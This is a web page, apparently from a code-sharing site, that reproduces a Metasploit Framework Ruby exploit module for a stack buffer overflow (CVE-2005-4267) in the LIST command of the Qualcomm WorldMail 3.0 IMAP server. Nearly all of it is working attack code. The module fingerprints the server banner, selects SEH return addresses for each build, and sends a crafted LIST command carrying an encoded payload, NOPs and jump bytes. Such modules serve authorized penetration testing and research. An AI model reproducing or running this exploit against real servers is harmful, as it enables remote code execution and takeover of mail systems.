扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 |
## # $Id: eudora_list.rb 9653 2010-07-01 23:33:07Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Imap include Msf::Exploit::Remote::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow', 'Description'=> %q{ This module exploits a stack buffer overflow in the Qualcomm WorldMail IMAP Server version 3.0 (builds 6.1.19.0 through 6.1.22.0). Version 6.1.22.1 fixes this particular vulnerability. NOTE: The service does NOT restart automatically by default. You may be limited to only one attempt, so choose wisely! }, 'Author' => [ 'MC', 'jduck' ], 'License'=> MSF_LICENSE, 'Version'=> '$Revision: 9653 $', 'References' => [ [ 'CVE', '2005-4267'], [ 'OSVDB', '22097'], [ 'BID', '15980'], ], 'Privileged' => true, 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Payload'=> { 'Space'=> 750, 'BadChars' => "\x00\x0a\x0d\x20\x7b", 'StackAdustment' => -3500, }, 'Platform' => 'win', 'Targets'=> [ [ 'Automatic', { } ], [ 'WorldMail 3 Version 6.1.19.0', { 'Ret' => 0x600b6317 } ], # p/p/r in MLstMgr.dll v6.1.19.0 [ 'WorldMail 3 Version 6.1.20.0', { 'Ret' => 0x10022187 } ], # p/p/r in msremote.dll ? [ 'WorldMail 3 Version 6.1.22.0', { 'Ret' => 0x10022187 } ], # p/p/r in MsRemote.dll v6.1.22.0 ], 'DisclosureDate' => 'Dec 20 2005', 'DefaultTarget' => 0)) end def check targ = auto_target disconnect return Exploit::CheckCode::Vulnerable if (targ) return Exploit::CheckCode::Safe end def auto_target connect if (banner and banner =~ /WorldMail/ and banner =~ /IMAP4 Server (.*) ready/) version = $1 ver = version.split('.') if (ver.length == 4) major = ver[0].to_i minor = ver[1].to_i rev = ver[2].to_i build = ver[3].to_i if (major == 6 and minor == 1) return targets[1] if (rev == 19) return targets[2] if (rev == 20) return targets[3] if (rev == 22) end end end # no target found nil end def exploit if (target_index == 0) mytarget = auto_target if mytarget print_status("Automatically detected \"#{mytarget.name}\" ...") else raise RuntimeError, 'Unable to automatically detect a target' end else mytarget = target connect end jmp ="\x6a\x05\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x2f\x77\x28" jmp << "\x4b\x83\xeb\xfc\xe2\xf4\xf6\x99\xf1\x3f\x0b\x83\x71\xcb\xee\x7d" jmp << "\xb8\xb5\xe2\x89\xe5\xb5\xe2\x88\xc9\x4b" sploit ="a001 LIST " + rand_text_alphanumeric(20) sploit << payload.encoded sploit << generate_seh_record(mytarget.ret) sploit << make_nops(8) + jmp + rand_text_alphanumeric(40) sploit << "}" + "\r\n" sock.put(sploit) handler disconnect end end |
体验盒子
